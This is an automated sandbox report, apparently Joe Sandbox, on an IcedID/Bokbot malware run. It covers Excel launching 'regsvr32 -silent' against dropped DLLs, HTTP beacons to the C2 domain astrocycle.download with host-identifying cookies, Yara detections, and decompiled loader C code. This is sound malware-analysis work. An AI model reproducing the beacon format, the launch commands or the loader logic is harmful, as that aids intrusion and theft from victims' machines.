                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996820927 CEST137INData Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
                                                                                                                                                                                                  Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.996836901 CEST139INData Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
                                                                                                                                                                                                  Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.997889996 CEST140INData Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
                                                                                                                                                                                                  Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49169 | 172.67.213.115 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:12:23.927584887 CEST | 445 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: __gads=3565085024:1:4650:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383635374239393136433034454441; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                  Host: astrocycle.download
Jul 6, 2021 15:12:24.448312044 CEST | 446 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:24 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eqVDpeP3%2FQWy91%2BnROpUr1zFbLOABWy3KxvIavdHrlVsvVafuJbIVzkMZyh5BR6WYn0mKLNptc2rXflmcrwvcPIeU1Dl6F5jJb5%2F5TDBK2ouFaIhUMxIOfZz6pAcN8WJTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a9159dbd54bef6-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 15:12:24.448345900 CEST | 446 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49171 | 104.21.37.209 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:12:27.807413101 CEST | 706 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: __gads=3565085024:1:4654:50; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:39463738354244374233363041433337; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                  Host: astrocycle.download
Jul 6, 2021 15:12:28.375191927 CEST | 707 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:28 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=l8sTPRPr0SR5YsRxyrHtM8gQuISQxKp9yDkj%2F1LMPCGQt7XetGwzm5Yor8njU3lv8MNq5cb9vIUsJpyjzD%2BCgJT8vqs1YUjL1g0Sxq4IPi3rIhgJvte%2FhZbAs0WkhnYGhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a915b5f966c2c7-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 15:12:28.375216007 CEST | 707 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.22 | 49173 | 104.21.37.209 | 80 | C:\Windows\System32\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 15:12:31.292399883 CEST | 966 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: __gads=3565085024:1:4657:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=393731333432:416C627573:31383342324439354536373742443933; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                  Host: astrocycle.download
Jul 6, 2021 15:12:31.803194046 CEST | 967 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:31 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lOvSG9X%2FFo%2BI4nY4BPSomypf2NoxaOFco55NGmQZiR4147BFRR9Egq3hSUazZ0AQm69ch3bpXkdlvozkrdJnr4rsV80CTom9NVsXlsGz%2B4dYjclvRzmhoAZ2JmepyCI8jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a915cbc9c64a62-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 15:12:31.803231001 CEST | 967 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 6, 2021 15:12:21.832746029 CEST | 13.224.92.73 | 443 | 192.168.2.22 | 49168 | CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
 | | | | | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025 | |
 | | | | | CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037 | |
 | | | | | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034 | |
Jul 6, 2021 15:12:26.234117985 CEST | 13.224.92.73 | 443 | 192.168.2.22 | 49170 | CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
 | | | | | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025 | |
 | | | | | CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037 | |
 | | | | | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034 | |
Jul 6, 2021 15:12:29.695225000 CEST | 13.224.92.73 | 443 | 192.168.2.22 | 49172 | CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
 | | | | | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025 | |
 | | | | | CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037 | |
 | | | | | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034 | |

                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:15:12:39
                                                                                                                                                                                                  Start date:06/07/2021
                                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                  Imagebase:0x13fc90000
                                                                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:15:12:42
                                                                                                                                                                                                  Start date:06/07/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                  Imagebase:0xff620000
                                                                                                                                                                                                  File size:19456 bytes
                                                                                                                                                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000003.00000002.2099597118.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                  • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:15:12:46
                                                                                                                                                                                                  Start date:06/07/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                  Imagebase:0xff620000
                                                                                                                                                                                                  File size:19456 bytes
                                                                                                                                                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2106878534.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:15:12:50
                                                                                                                                                                                                  Start date:06/07/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                  Imagebase:0xff620000
                                                                                                                                                                                                  File size:19456 bytes
                                                                                                                                                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000006.00000002.2114378210.0000000000120000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                  • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                    			E004627BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                    				void* __rdi;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				long long _t46;
                                                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                    				intOrPtr* _t62;
                                                                                                                                                                                                    				signed long long _t64;
                                                                                                                                                                                                    				long long* _t67;
                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                    				struct HINSTANCE__* _t79;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                    				char* _t83;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = __rsi;
                                                                                                                                                                                                    				_t46 = __rbx;
                                                                                                                                                                                                    				_t44 = _t69;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 0x18)) = __rbp;
                                                                                                                                                                                                    				 *((long long*)(_t44 + 0x20)) = __rsi;
                                                                                                                                                                                                    				_push(_t62);
                                                                                                                                                                                                    				_t80 = __rcx;
                                                                                                                                                                                                    				_t83 = L"; _gid=";
                                                                                                                                                                                                    				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
                                                                                                                                                                                                    				LoadLibraryA(_t82);
                                                                                                                                                                                                    				GetProcAddress(_t79);
                                                                                                                                                                                                    				_t67 = _t44;
                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					r9d = 1;
                                                                                                                                                                                                    					_t23 = E00462990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x4670c4, _t77, _t78);
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					return _t23;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t24 =  *_t67(); // executed
                                                                                                                                                                                                    				if(_t24 == 0x6f && __rbx != 0) {
                                                                                                                                                                                                    					GetProcessHeap();
                                                                                                                                                                                                    					_t9 = _t64 + 8; // 0x8
                                                                                                                                                                                                    					_t36 = _t9;
                                                                                                                                                                                                    					HeapAlloc(??, ??, ??);
                                                                                                                                                                                                    					_t62 = _t44;
                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t54 = _t44; // executed
                                                                                                                                                                                                    					_t27 =  *_t67(); // executed
                                                                                                                                                                                                    					if(_t27 == 0) {
                                                                                                                                                                                                    						_t48 = _t62;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
                                                                                                                                                                                                    								_t35 =  *((intOrPtr*)(_t48 + 0x194));
                                                                                                                                                                                                    								if(_t54 - 1 <= 7) {
                                                                                                                                                                                                    									r9d = _t35;
                                                                                                                                                                                                    									_t18 = _t48 + 0x198; // 0x198
                                                                                                                                                                                                    									_t54 = _t80 + _t64 * 2;
                                                                                                                                                                                                    									E00462990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
                                                                                                                                                                                                    									_t64 = _t64 + _t44;
                                                                                                                                                                                                    									_t83 = ":";
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t48 =  *_t48;
                                                                                                                                                                                                    						} while (_t48 != 0);
                                                                                                                                                                                                    						GetProcessHeap();
                                                                                                                                                                                                    						_t36 = 0;
                                                                                                                                                                                                    						_t23 = HeapFree(??, ??, ??);
                                                                                                                                                                                                    						if(_t64 == 0) {
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					GetProcessHeap();
                                                                                                                                                                                                    					_t36 = 0;
                                                                                                                                                                                                    					HeapFree(??, ??, ??);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
























                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00462CFE,?,?,00000003,004624A4), ref: 0046280F
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00462CFE,?,?,00000003,004624A4), ref: 00462845
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersInfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177971545-0
                                                                                                                                                                                                    • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction ID: 8e02e37169c55f3fab00b64b4f2e71b8b079a56f11b60fa362506f2dbe4314e4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06319EA1605B91A2EF15EB62E90079A7760EB86F94F484126CF0D0B714FF7DC549C30A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction ID: a4f0ade3b2f593b6b20335291011d004762fbf551a48c8b811083295028b8f1e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C71B072311B9187EB24CFA6E84479A37A1FB8AB94F088526DF4A43B24EF38C555C705
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LookupAccountNameW.ADVAPI32 ref: 0046233C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccountLookupName
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1484870144-0
                                                                                                                                                                                                    • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction ID: e94bb4ed929cecc6f65f593610d57a657bfa550e44808f88ba045ebe4afa3953
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8316BB2705E519AEF108FB4E9443AA33A4EB89B88F584136DB4D57B18FF38C549C346
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(?,?,00000000,00462CB1,?,?,00000003,004624A4), ref: 004616CB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InformationQuerySystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3562636166-0
                                                                                                                                                                                                    • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction ID: 49e191df9af061c057f453c712fc4431cd8c5775745e495956b4b98a4e29b739
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 962153A5315B5083EF158F92A84435662A1BB86BD2F1C4036DF4A47724FF3DC945870A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E00462434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
                                                                                                                                                                                                    				void* __rbp;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed long long _t51;
                                                                                                                                                                                                    				signed long long _t52;
                                                                                                                                                                                                    				signed long long _t64;
                                                                                                                                                                                                    				long long _t69;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t82 = __r9;
                                                                                                                                                                                                    				_t71 = __rsi;
                                                                                                                                                                                                    				_t69 = __rdi;
                                                                                                                                                                                                    				_t64 = __rdx;
                                                                                                                                                                                                    				_t52 = __rbx;
                                                                                                                                                                                                    				_t51 = __rax;
                                                                                                                                                                                                    				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                    				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                    				_t73 = _t75 - 0x57;
                                                                                                                                                                                                    				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                    				_t40 = _t4;
                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                    				L9:
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    				L1:
                                                                                                                                                                                                    				asm("rdtsc");
                                                                                                                                                                                                    				_t64 = _t64 << 0x20;
                                                                                                                                                                                                    				_t51 = _t51 | _t64;
                                                                                                                                                                                                    				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                    				SleepEx(??, ??); // executed
                                                                                                                                                                                                    				_t69 = _t69 - 1;
                                                                                                                                                                                                    				if(_t69 != 0) {
                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					wsprintfA();
                                                                                                                                                                                                    					E004611FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                    					_t37 = E0046153C(_t73 - 0x29);
                                                                                                                                                                                                    					E00462C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                    					_t44 = _t51;
                                                                                                                                                                                                    					if(_t51 != 0) {
                                                                                                                                                                                                    						_t80 = _t73 + 0x67;
                                                                                                                                                                                                    						if(E00461EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                    							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                    								_t27 = E0046272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                    								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                    								_t41 = _t27;
                                                                                                                                                                                                    								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                    									GetProcessHeap();
